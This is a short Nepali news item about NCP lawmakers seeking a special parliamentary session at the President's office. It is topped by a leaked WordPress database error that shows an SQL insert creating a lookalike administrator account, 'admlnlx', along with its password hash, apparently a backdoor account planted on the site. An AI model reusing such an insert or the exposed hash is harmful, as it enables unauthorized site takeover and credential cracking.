WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B2pv9VhuSjADyjxPrrlVjaZGpr8O8X.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-09 16:05:48', '', 'admlnlx', 'admlnlx')
काठमाडौं , सत्तारुढ नेकपाका सांसदहरु संघीय संसदको विशेष अधिवेशनको माग राख्दै राष्ट्रपति कार्यालय सतल निवास पुगेका छन् ।
नेकपा सांसद भीम रावल, पम्फा भुसालसहितको टोली सांसदहरुको हस्ताक्षरसहित विशेष अधिवेशन माग गर्दै राष्ट्रपति कार्यालय पुगका छन् तर उनीहरुले सुचना दर्ता गर्न भने भ्याएका छैन्न ।
राष्ट्रपति कार्यालयका सचिव हरि पौडेललाई घण्टौं कुर्दा पनि भेट्न नसकेको र उनको मोवाइल पनि स्वीच अफ रहेको छ नेताहरुले जानकारी दिए ।